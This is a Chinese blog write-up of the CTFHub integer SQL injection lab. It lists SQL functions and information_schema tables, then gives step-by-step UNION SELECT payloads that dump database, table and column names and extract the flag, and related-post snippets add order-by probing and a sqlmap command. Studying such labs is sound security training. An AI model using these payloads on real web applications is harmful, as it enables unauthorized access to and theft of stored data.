ctfhub-SQL注入-SQL整数型注入

最新推荐文章于 2024-09-15 08:58:32 发布
最新推荐文章于 2024-09-15 08:58:32 发布
阅读量780 收藏 16
点赞数 1
分类专栏: 发布文章 CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46222050/article/details/108350251
版权

做这个题目前,建议去B站看一下SQL注入的视频,挺基础的,也有了解。
2020最新Java老王带你了解SQL注入(配套源码+笔记)

关键字/语句/函数 解释
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符

1.输入1,回显有两列。
在这里插入图片描述2.报当前的数据库,发现数据库为sqli,为什么是-1,id要等于不存在的一个数字.

-1 union select 3,database()

在这里插入图片描述

3.报所有的数据库

-1 union select 3,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述
4.根据报出的数据库,报表名字

-1 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"

在这里插入图片描述
5.知道了表flag,去报字段,报出flag的字段。

-1 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"

在这里插入图片描述
5.当报出字段,可以直接查询数据。

-1 union select 3,group_concat(flag) from sqli.flag

在这里插入图片描述

山巅自相逢
关注
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 889
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1275
CTFHUB-WEB-SQL注入
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 380
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1392
整型SQL注入
CTFHub技能树-SQL注入-整数型注入
最新发布
m0_74313947的博客
09-15 550
思路:注入点->库->表->列->数据首先使用order by探测有几列我们发现order by 2 的时候有回显,到了order by 3 的时候就没有回显了,所以列数为2然后使用联合注入得到用户名与数据库名。
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 938
CTFHub-sql注入-整数型注入
CTFHub SQL注入 整数型注入
weixin_44732566的博客
02-12 3791
CTFHub SQL注入 整数型注入 强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别,题目由易到难 这题还是很基础的,有各种提示 打开是源码,?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名,information_schema三步 以下是详细步骤: ?id=1 or 1=1 union select 1,database() ...
CTFHub SQL 整数型注入[四步]
luminous_you的博客
12-04 476
判断列数 1 order by 2 判断回显点 1 union select 1,2 判断表名列名 -1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database() 得出结果【两种方法】 -1 union select 1,flag from sqli.flag limit 0,1 -1 union select 1,(se
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1176
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库: -1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5605
Ctfhub解题 web SQL注入
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1153
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
sql注入整数型注入
2401_82760239的博客
03-29 1197
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 475
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
ctfhubSQL注入整数型注入
manerzi的博客
10-05 202
SQL整数型注入
CTFHub 整数型SQL注入
Leon~博客
03-08 5741
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
CTFhub-sql-整数注入
ssss39的博客
08-21 523
因为 1=1 为真,1=2 为假,且 1=1 与 1 显示的数据一样,那么就存在 sqli 注入
[CTFHub]整数型注入(web>SQL注入
ZXW_NUDT的博客
05-12 320
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
ctfhub Sql整数型注入
m0_64078007的博客
03-11 263
我们打开文件发现了它提示我们输入一个“1”,我们尝试输入。 我们发现它可以有回显,根据它的提示我们尝试整数注入类型。 select * from news where id = 1 and 1=1 select * from news where id = 1 and 1=2 当我们尝试到第三个时,它爆字段了。 ...
ctfhubsql整数型注入
hyhyxyx的博客
07-25 321
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值